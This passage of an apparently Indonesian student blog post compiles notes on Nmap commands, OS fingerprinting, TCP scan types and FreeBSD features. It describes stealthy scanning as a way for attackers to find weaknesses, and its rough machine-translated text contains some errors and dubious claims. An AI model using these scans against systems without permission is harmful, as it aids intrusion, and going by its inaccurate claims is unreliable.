Selain itu, adanya IP Raw juga untuk mengetahui layanan yang diberikan yang di dalamnya memuat nama dan juga versi aplikasi, sistem operasi lengkap dengan versinya, dan juga apa saja jenis firewall atau paket filter yang digunakan. Dengan menggunakan NMAP, maka pengguna bisa memperoleh informasi yang lengkap tentang seperti apa jaringan atau host tersebut.

2. Melakukan scanning pada port jaringan

Fungsi kedua dari adanya NMAP adalah untuk melakukan scanning terhadap suatu port jaringan komputer. Port adalah nomor yang berguna untuk membedakan antara aplikasi yang satu dengan aplikasi yang lainnya yang masih berada dalam jaringan komputer.

Contohnya, sekarang Anda tinggal di Malang yang memiliki kode pos 65141, sementara teman Anda sekarang berada di Bandung dengan kode pos 40111. Kode pos tersebut yang nantinya bisa digunakan untuk membedakan antar aplikasi. Setiap aplikasi yang terpasang pada komputer harus memiliki port dan masing-masing port tersebut harus berbeda. Port tersebut juga bisa dianalogikan sebagai sebuah IP Address yang berperan dalam membedakan antara perangkat atau komputer satu dengan komputer yang lainnya.

Dengan menggunakan NMAP, maka seseorang bisa melakukan scanning terhadap port-port tersebut. Maka seseorang bisa mengetahui aplikasi mana saja yang terpasang pada suatu perangkat.

Cara Kerja NMAP

Pengertian NMAP dan Cara Kerjanya

Berikut ini kami akan menjelaskan kepada Anda semuanya tentang bagaimana cara kerja NMAP yang sebenarya cara kerjanya tidak jauh berbeda dengan ketika Anda melihat atau mengamati cara kerja pengiriman data dari satu komputer ke komputer yang lainnya.

Perlu Anda ketahui bahwa NMAP bekerja dengan mengirimkan paket menuju target dengan menggunakan IP raw yang memiliki cara kerja yang canggih sehingga bisa menentukan mana saja host yang aktif. Selain itu, NMAP juga melaksanakan bruteforce menuju port list yang dimilikinya yang nantinya akan dipakai di dalam menentukan status dari port host yang sedang aktif, baik itu dengan cara melakuka filter, close, maupun juga open.

Ternyata tidak sampai di situ saja kemampuan yang dimiliki oleh NMAP. NMAP juga diketahui mampu melihat sistem operasi apa dan lengkap dengan versinya yang digunakan atau terinstal pada suatu perangkat. Darimana NMAP mendapatkan informasi tersebut? Tentunya melalui port yang aktif atau open tadi.

Cara Menggunakan NMAP

Setelah Anda memahami tentang pengertian, fungsi, dan juga cara kerja dari NMAP. Anda juga harus tahu informasi yang juga tidak kalah penting yaitu tentang bagaimana cara menggunakan NMAP. Berikut ini langkah-langkah yang harus Anda lakukan ketika ingin menggunakan NMAP.

  • Pertama, Anda harus memeriksa port mana saja yang berstatus open alias terbuka. Caranya dengan mengetikkan nmap<host/IP target>.
  • Kedua, Anda juga harus memeriksa port secara lebih terperinci atau spesifik terhadap mesin target. Perintah yang harus Anda ketikkan adalah nmap -p <host/IP target>.
  • Ketiga, untuk melakukan pemeriksaan terhadap service yang sedang berjalan, maka ketikkan nmap – sV<host/IP target>.
  • Keempat, jika ingin melakukan pemeriksaan terhadap port mesin target di dalam satu segmen yaitu dengan mengetikkan nmap<host/IP target>.
  • Kelima, jika Anda hendak mengidentifikasi sistem operasi, maka Anda tinggal mengetikkan nmap -O <host/IP target>.

OS Fingerprinting

OS Fingerprinting: - OS Fingerprinting mengacu pada deteksi sistem target operasi komputer.
Karena, sistem operasi yang berbeda merespon berbeda terhadap jenis pesan ICMP yang sama, sangat penting bagi seorang penyerang untuk menentukan sistem operasi yang tepat berjalan pada sistem target.
Juga penyerang dapat melakukan serangan dengan mengambil alih kerentanan / bug yang ditemukan dalam sistem operasi tertentu.
Ada empat bidang yang akan kita lihat untuk menentukan sistem operasi (namun ada tanda tangan lain yang dapat digunakan). Signature ini adalah:


1) TTL - What the operating system sets the Time To Live on the outbound packet.
2) Window Size - What the operating system sets the Window Size at.
3) DF - Does the operating system set the Don't Fragment bit.
4) TOS - Does the operating system set the Type of Service, and if so, at what.


Ada dua jenis teknik OS Fingerprinting -

1) Aktif OS Fingerprinting: - Jauh operasi sistem aktif fingerprinting adalah proses aktif menentukan sistem operasi yang mendasari sebuah node jaringan yang ditargetkan dengan menyelidiki
Sistem ditargetkan dengan beberapa paket dan memeriksa respon (s), atau kekurangan itu, diterima? Pendekatan tradisional adalah untuk memeriksa perilaku TCP / IP stack (IP, TCP, UDP, dan protokol ICMP) dari sebuah elemen jaringan ditargetkan ketika diperiksa dengan paket yang sah dan / atau cacat beberapa.

Rekomendasi Alat
Nmaphttp://insecure.org/nmap


2) Pasif OS Fingerprinting: - fingerprinting pasif didasarkan pada jejak sniffer dari sistem remote. Alih-alih aktif query sistem remote, semua yang perlu Anda lakukan adalah menangkap paket dikirim dari sistem remote. Berdasarkan jejak sniffer paket ini, Anda dapat menentukan sistem operasi dari remote host. Sama seperti dalam sidik jari yang aktif, fingerprinting pasif
didasarkan pada prinsip bahwa IP stack setiap sistem operasi memiliki kekhasan sendiri. Dengan menganalisis jejak sniffer dan mengidentifikasi perbedaan-perbedaan ini, Anda dapat menentukan sistem operasi dari remote host.

Rekomendasi Alat
P0fhttp://lcamtuf.coredump.cx/p0f.shtml
Ettercaphttp://ettercap.sourceforge.net

Network scanner

Pengertian network scanning

Pengertian Network scanning
Network scanning merupakan cara yang digunakan untuk melakukan scanning pada mesin jaringan, baik itu untuk mendapatkan IP, Port, Packet data yang keluar masuk melalui jaringan, termasuk merekam aktifitas browsing, yang tentunya terdapat password dan username.
Jenis Jenis Network Scanning
Connect scan (-sT)
Jenis scan ini connect ke port sasaran dan menyelesaikan three-way handshake (SYN, SYN/ACK, dan ACK). Scan ini mudah terdeteksi oleh sistem sasaran.
• TCP SYN Scan (-sS)
Paling populer dan merupakan scan default nmap. SYN scan juga sulit terdeteksi karena tidak menggunakan 3 way handshke secara lengkap, yang disebut dengan teknik Half Open Scanning. SYN scan juga efektif karena dapat membedakan 3 state port yaitu open, filterd ataupun close. Teknik ini dikenal sebagai half open scanning karena suatu koneksi penuh TCP tidak sampai terbentuk. Sebaliknya suatu paket SYN dikirimkan ke port sasaran. Bila SYN/ACK diterima port sasaran, kita dapat mengambil kesimpulan bahwa port itu berada dalam status LISTENING. Suatu RST/ACT akan dikirim oleh mesin yang melakukan scanning sehingga koneksi penuh tidak akan terbentuk. Teknik ini bersifat siluman dibandingkan TCP connect penuh, dan tidak ada tercatat pada log sistem sasaran.
• TCP FIN (-sF)
Teknik ini mengirim suatu paket FIN ke port sasaran. Berdasarkan RFC 793, sistem sasaran akan mengirim balik suatu RST untuk setiap port yang tertutup. Teknik ini hanya dapat dipakai pada stack TCP/IP berbasis UNIX.
• TCP Xmas Tree Scan (-sX)
Teknik ini mengirimkan paket FIN, URG dan PUSH ke port sasaran. Berdasarkan RFC 739, sistem sasaran akan mengembalikan suatu RST untuk semua port yang tertutup.
• TCP Null (-sN)
Teknik ini membuat off semua flag. Berdasarkan RFC 793, sistem sasaran akan mengirim balik suatu RST untuk semua port yang tertutup.
• TCP ACK scan (-sA)
Teknik ini digunakan untuk memetakan set aturan firewall. Dapat membantu menentukan apakah firewall itu merupakan suatu simple packet filter yang membolehkan hanya koneksi-koneksi tertentu (koneksi dengan bit set ACK) atau suatu firewall yang menjalankan advance packet filtering.
Cara kerja network scanner
1.            Untuk mendapatkan akses ke host, cracker harus mengetahui titik-titik kelemahan yang ada. Sebagai contoh, apabila cracker sudah mengetahui bahwa host menjalankan proses ftp server, ia dapat menggunakan kelemahan-kelemahan yang ada pada ftp server untuk mendapatkan akses.
2.            Biasanya "scanning" dijalankan secara otomatis mengingat "scanning" pada "multiple-host" sangat menyita waktu. "Hackers" biasanya mengumpulkan informasi dari hasil "scanning" ini. Dengan mengumpulkan informasi yang dibutuhkan maka "hackers" dapat menyiapkan serangan yang akan dilancarkannya.
3.            Scanner biasanya bekerja dengan men-scan port TCP /IP dan servis servisnya dan mencatat respon dari komputer target. Dari scanner ini dapat diperoleh informasi mengenai port-port mana saja yang terbuka. Kemudian yang dilakukan adalah mencari tahu kelemahan-kelemahan yang mungkin bisa dimanfaatkan berdasar port yang terbuka dan aplikasi serta versi aplikasi yang digunakan.



Berikut contoh penggunaan scanning tools  :
1.            softPerfect Network Scanner adalah gratis biaya aplikasi yang mampu untuk menawarkan keamanan jaringan yang lebih baik. SoftPerfect Network Scanner adalah IP multi-threaded bebas, NetBIOS dan SNMP scanner dengan antarmuka yang modern dan beberapa fitur canggih. Hal ini ditujukan untuk para administrator sistem dan pengguna umum yang tertarik pada keamanan komputer. Ping program komputer, scan untuk mendengarkan TCP port dan menampilkan jenis sumber daya yang dibagi pada jaringan (termasuk sistem dan tersembunyi).
Fitur SoftPerfect Network Scanner 5.2:\
1)      Ping komputer.
2)      Tidak membutuhkan hak akses administratif.
3) Mendeteksi hardware (MAC) alamat bahkan di router.
4) Mendeteksi shared folder tersembunyi (biasanya terlihat pada jaringan) dan menulis saham diakses.
5) Mendeteksi alamat internal dan eksternal Anda IP.
6) Memindai untuk mendengarkan port TCP dan layanan SNMP.
7)   Mengambil saat log-on pengguna.
8) Anda dapat me-mount dan menjelajahi sumber daya jaringan.
9) Dapat menjalankan aplikasi eksternal pihak ketiga.
10) Ekspor hasil ke HTML, XML, CSV dan TXT
11) Mendukung Wake-On-LAN, remote shutdown dan pesan jaringan pengiriman.
12) Mengambil berpotensi informasi melalui WMI.
13) Mengambil informasi dari registri remote.
14) Ini benar-benar gratis, tidak memerlukan instalasi, dan tidak mengandung adware / spyware / malware

Konfigurasi sistem keamanan jaringan Linux/FreeBSD
FreeBSD adalah sebuah operating system nonkomersial yang biasa kita sebut freeware, gratisan.tetapi tidak semua yang gratisan itu kualitasnya lebih jelek dari yang berbayar, hal itu dibuktiin sama sahabat kita ini. Bahkan sebuah situs yang namanya tidak bisa disebutin membandingkan semua hal baik performance, security, kompabilitas de el el antara FreeBSD dengan linux (gratisan juga nih), memberikan angka memuaskan untuk 8 katagori ditambah 2 katagori standar buat FreeBSD, sedangkan linux cukup dengan 4 katagori memuaskan, 4 standar, dan 2 mengecewakan.

Jika dibandingkan dengan yang berbayar seperti vista, FreeBSD masih tetap unggul. 1994. FreeBSD merupakan sistem operasi open source yang tangguh untuk keamanan jaringan maupun server.

SEJARAH & PERKEMBANGAN

Sejarah munculnya FreeBSD berawal dari pengembangan system Operasi Unix yang dirancang oleh Ken Thompson dan Dennis Ritchie, peneliti dari AT&T Bell Laboratories. Selama pertengahan tahun 70an, Ken Thompson memperkenalkan UNIX ke University of California di Berkeley. Dan ketika University of California at Berkeley menerima source code ini (membeli dengan harga $400), co-creator Unix, Ken Thompson, tengah berkunjung ke salah satu fakultas. Melalui bantuannya yang konsisten, para periset dan mahasiswa, terutama Bill Joy (salah satu pendiri Sun Microsystem), berusaha mengembangkan source code Unix tersebut dan melahirkan apa yang disebut The Berkeley Software Distribution (BSD).

Dengan dukungan pendanaan dari DARPA (departemen pertahanan Amerika), Berkeley Computer System Research Group (CSRG) selanjutnya menjadi bagian penting dalam pengembangan Unix disamping Bell Labs. Bersamaan dengan Unix System V AT&T sendiri, BSD tumbuh menjadi salah satu dari dua flavor Unix mayor pada saat itu.

Faktanya, sistem Unix BSD berkembang lebih inovatif dari Unix System V. Ia lebih digemari oleh kalangan akademik dan institusi-institusi riset daripada perusahaan komersial.

FITUR FREE BSD

Networking (Jaringan)
TCP/IP FreeBSD stack mengambil dasar pada implementasi TCP/IP 4.2BSD yang sangat berkontribusi terhadap protokol TCP/IP. Selain itu FreeBSD juga mendukung IPv6, SCTP, IPSec, IPX, AppleTalk dan jaringan wireless.
Storage (Penyimpanan)

FreeBSD memiliki beberapa fitur atau kemampuan unik yang berhubungan dengan penyimpanan. Terdapat sebuah fitur bernama Soft update yang dapat menjaga filesystem tetap terintegrasi dan terhindar dari system crash. Hal ini dimaksudkan agar tak ada bagian kecil dari sistem yang tidak kompatibel satu sama lain yang menyebabkan crash di tengah jalan sehingga sistem akan selalu terpelihara dan tersinkron. Selain itu terdapat juga GEOM framework yang menyediakan fitur seperti RAID (level 0, 1, 3 saat ini Maret 2011), full disk encryption, dan sistem drive yang terpadu. Filesystem snapshots memperbolehkan sebuah image dari filesystem dibuat dengan cepat dan mudah. Gunanya adalah untuk melakukan backup terhadap filesystem manakala dibutuhkan. FreeBSD juga menyediakan filesystem ZFS sebagai alternatif filesystem UFS2. Sistem drive terpadu mirip seperti operating sistem turunan unix lain yaitu seperti sebuah pohon besar dengan setiap folder / file merupakan cabang dari folder utama yang disebut root.

Security (Keamanan)
FreeBSD menyediakan fitur-fitur keamanan seperti access control lists (ACLs), security event auditing, extended file system attributes, mandatory access controls (MAC). Fitur keamanan ini dikembangkan melalui proyek TrustedBSD. Proyek ini masih berlangsung dan sudah banyak extension yang telah diintegrasikan ke dalam FreeBSD.

Proyek ini juga mem-porting implementasi FLASK/TE NSA dari SELinux ke FreeBSD. Pekerjaan lain yang sedang berlangsung adalah pengembangan OpenBSM, sebuah implementasi open source dari Sun’s Basic Security Module (BSM) API dan audit log file format, yang mendukung sistem audit secara ekstensif. Proyek ini telah diintegrasikan ke dalam FreeBSD 6.2. Beberapa infrastruktur work in FreeBSD performed as part of the TrustedBSD Project has included SYN cookies, GEOM and OpenPAM.

Portability (Portabilitas)
FreeBSD telah di-porting ke berbagai arsitektur prosesor. The FreeBSD project membagi arsitektur ke dalam beberapa “tier” yang menggambarkan level dukungan terhadap sistem arsitektur tersebut. Hal ini dilakukan untuk kemudahan dalam dokumentasi dan pengembangan melalui arsitektur tersebut. Arsitektur Tier 1 adalah arsitektur yang lengkap dan telah didukung sepenuhnya. Arsitektur Tier 2 adalah proyek yang masih dalam tahap pengembangan dan masih berjalan saat ini. Arsitektur Tier 3 masih bersifat atau mungkin sudah tidak lagi dalam pengembangan (seperti arsitektur FreeBSD untuk DEC Alpha) dand arsitektur tier 4 yang tak didukung sama sekali.

KELEBIHAN DAN kEKURANGAN

Kelebihan

Memiliki sistem software third-party yang memberikan kemudahan yang berarti bagi para user untuk menambah atau menghapus aplikasi-aplikasi. Para user cukup mengeksekusi satu baris perintah dan aplikasi-aplikasi dengan sendirinya di-download, dicek integritasnya, di-build, dan diinstall secara otomatis. Tugas-tugas administrasi sistem menjadi sangat praktis dan mudah.
Keuntungan lain dalam memakai freebsd sebagai server diantaranya adalah mudah, gratis (bisa di download langsung dr http://www.freebsd.org), secure, powerfull, mendukung patch dan update, disertai port dan package u/ memudahkan install software lain, disertai firewall, dan ada team yang akan selalu develop OS FreeBSD.
Sistem stabil untuk database, server internet, intranet, fill-server, intranet client, pengembangan java.,FreeBSD dpt berjalan lebih cepat dari Linux dalam beberapa bagian misal sbg server NFS,Termasuk s. operasi yg hemat karena fersi gratisnya.

Kekurangan

Sedikit software untuk kantor apalagi versi gratisnya, Free BSD tidak dpt digunakan pada mikro karnal lam PC IBM, Free BSD tidak dpt mendukung ISA-plug-and-ply-card, Kecilnya basis developer dan pemakai yg mencari bug/kelemahan program, Belum jelas masa depannya untuk server database dan sistem operasi desktop .


Sumber :

https://www.baktikominfo.id/id/informasi/pengetahuan/mengetahui_tentang_sistem_keamanan_jaringan_untuk_proteksi_perangkat_komputer_anda-677#:~:text=Sistem%20keamanan%20jaringan%20adalah%20proses,komputer%20maupun%20pencurian%20data%20seseorang.

https://lolitadewinovienty.wordpress.com/aspek-utama-keamanan-aringan/

https://www.slideshare.net/mobile/Fajar_Sany/ancamanancaman-pada-keamanan-jaringan-komputer-30026323#:~:text=2.%20Ancaman%20keamanan%20jaringan%20komputer,jaringan%20menjadi%20hancur%20atau%20rusak.

https://muhamadfahritkj.blogspot.com/2019/10/teknik-penyediaan-layanan-jaringan.html?m=1

https://www.google.com/amp/s/belajarcisco866.wordpress.com/2016/10/29/keamanan-pada-osi-layer/amp/

https://www.google.com/amp/s/almaspens.wordpress.com/2016/04/03/snort/amp/

https://ilmukomputerzakaria.blogspot.com/2015/08/pengertian-netcat-dan-fiturnya.html?m=1

https://www.nesabamedia.com/pengertian-nmap/amp/

http://sharelokelo.blogspot.com/2011/06/os-fingerprinting.html

https://abdulrahmanrohitnet.blogspot.com/2019/10/pengertian-network-scanning-network.html

https://idang12.blogspot.com/2019/10/konfigurasi-sistem-keamanan-linux-dan.html

Komentar

Postingan populer dari blog ini

Konfigurasi Vlan dengan 1 Router,1 Switch,& 2 PC

Menganalisis Kebutuhan Telekomunikasi Dalam Jaringan